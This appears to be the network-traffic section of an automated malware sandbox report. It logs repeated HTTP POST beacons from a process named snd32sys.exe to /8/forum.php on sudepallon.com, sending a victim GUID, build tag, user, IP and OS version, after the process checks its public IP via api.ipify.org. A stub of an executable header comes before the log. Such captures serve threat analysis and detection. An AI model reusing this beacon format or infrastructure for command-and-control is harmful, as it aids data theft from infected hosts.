Data Ascii: MZ@!L!This program cannot be run in DOS mode.$cmmmmmmmmmmmmRichmPEL<`bpW@u@ @Gp9T9@.text`b `.rdataPf@@.data^l@.rsrc@@@.reloc@G H^@BU@p[S`2-S'z]hoAYho5YU


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.3 | 49764 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:31:56.518250942 CEST | 6034 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:31:56.586610079 CEST | 6034 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:31:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 48 41 5a 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cHAZSARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.3 | 49765 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:31:56.938754082 CEST | 6035 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:31:57.006598949 CEST | 6035 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:31:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 46 56 45 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cFVEUARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.3 | 49766 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:31:57.339512110 CEST | 6036 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:31:57.414515972 CEST | 6037 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:31:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 51 41 5a 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cQAZJARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.3 | 49767 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:31:57.757333994 CEST | 6037 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:31:57.826961040 CEST | 6038 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:31:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 46 4a 51 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cFJQUARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.3 | 49768 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:31:58.204698086 CEST | 6039 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:31:58.276258945 CEST | 6039 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:31:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 56 5a 41 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cVZAEARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.3 | 49769 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:31:58.606812954 CEST | 6040 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:31:58.675935984 CEST | 6040 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4d 43 58 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cMCXNARRABw==0


Session ID: 16 | Source IP: 192.168.2.3 | Source Port: 49770 | Destination IP: 77.222.42.67 | Destination Port: 80 | Process: C:\Users\Public\snd32sys.exe

Timestamp: Jul 8, 2021 16:31:59.018161058 CEST | kBytes transferred: 6041 | Direction: OUT
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

Timestamp: Jul 8, 2021 16:31:59.090984106 CEST | kBytes transferred: 6042 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4e 4b 50 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cNKPMARRABw==0


Session ID: 17 | Source IP: 192.168.2.3 | Source Port: 49771 | Destination IP: 77.222.42.67 | Destination Port: 80 | Process: C:\Users\Public\snd32sys.exe

Timestamp: Jul 8, 2021 16:31:59.415894985 CEST | kBytes transferred: 6043 | Direction: OUT
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

Timestamp: Jul 8, 2021 16:31:59.487183094 CEST | kBytes transferred: 6043 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4e 4e 4d 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cNNMMARRABw==0


Session ID: 18 | Source IP: 192.168.2.3 | Source Port: 49772 | Destination IP: 77.222.42.67 | Destination Port: 80 | Process: C:\Users\Public\snd32sys.exe

Timestamp: Jul 8, 2021 16:31:59.801717997 CEST | kBytes transferred: 6044 | Direction: OUT
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

Timestamp: Jul 8, 2021 16:31:59.868599892 CEST | kBytes transferred: 6044 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4e 4b 50 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cNKPMARRABw==0


Session ID: 19 | Source IP: 192.168.2.3 | Source Port: 49773 | Destination IP: 77.222.42.67 | Destination Port: 80 | Process: C:\Users\Public\snd32sys.exe

Timestamp: Jul 8, 2021 16:32:00.207560062 CEST | kBytes transferred: 6045 | Direction: OUT
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

Timestamp: Jul 8, 2021 16:32:00.276813984 CEST | kBytes transferred: 6045 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 46 4b 50 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cFKPUARRABw==0


Session ID: 2 | Source IP: 192.168.2.3 | Source Port: 49756 | Destination IP: 23.21.173.155 | Destination Port: 80 | Process: C:\Users\Public\snd32sys.exe

Timestamp: Jul 8, 2021 16:31:52.909492970 CEST | kBytes transferred: 5479 | Direction: OUT
GET / HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: api.ipify.org
Cache-Control: no-cache

Timestamp: Jul 8, 2021 16:31:53.014983892 CEST | kBytes transferred: 5479 | Direction: IN
HTTP/1.1 200 OK
Server: Cowboy
Connection: keep-alive
Content-Type: text/plain
Vary: Origin
Date: Thu, 08 Jul 2021 14:31:52 GMT
Content-Length: 14
Via: 1.1 vegur
Data Raw: 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30
Data Ascii: 185.189.150.70


Session ID: 20 | Source IP: 192.168.2.3 | Source Port: 49774 | Destination IP: 77.222.42.67 | Destination Port: 80 | Process: C:\Users\Public\snd32sys.exe

Timestamp: Jul 8, 2021 16:32:00.613718033 CEST | kBytes transferred: 6046 | Direction: OUT
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

Timestamp: Jul 8, 2021 16:32:00.681197882 CEST | kBytes transferred: 6046 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 41 54 47 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cATGZARRABw==0


Session ID: 21 | Source IP: 192.168.2.3 | Source Port: 49775 | Destination IP: 77.222.42.67 | Destination Port: 80 | Process: C:\Users\Public\snd32sys.exe

Timestamp: Jul 8, 2021 16:32:01.018528938 CEST | kBytes transferred: 6047 | Direction: OUT
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

Timestamp: Jul 8, 2021 16:32:01.088430882 CEST | kBytes transferred: 6047 | Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4e 48 53 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cNHSMARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
22 | 192.168.2.3 | 49776 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe

Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:01.437737942 CEST | 6048 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:01.505616903 CEST | 6049 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 47 4d 4e 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cGMNTARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
23 | 192.168.2.3 | 49777 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe

Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:01.835478067 CEST | 6049 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:01.903317928 CEST | 6050 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 43 41 5a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cCAZXARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
24 | 192.168.2.3 | 49778 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe

Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:02.240464926 CEST | 6051 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:02.306262970 CEST | 6051 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4b 41 5a 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cKAZPARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
25 | 192.168.2.3 | 49779 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe

Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:02.637330055 CEST | 6052 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:02.708657980 CEST | 6052 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 54 48 53 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cTHSGARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
26 | 192.168.2.3 | 49780 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe

Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:03.034343958 CEST | 6053 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:03.099986076 CEST | 6053 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 43 48 53 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cCHSXARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
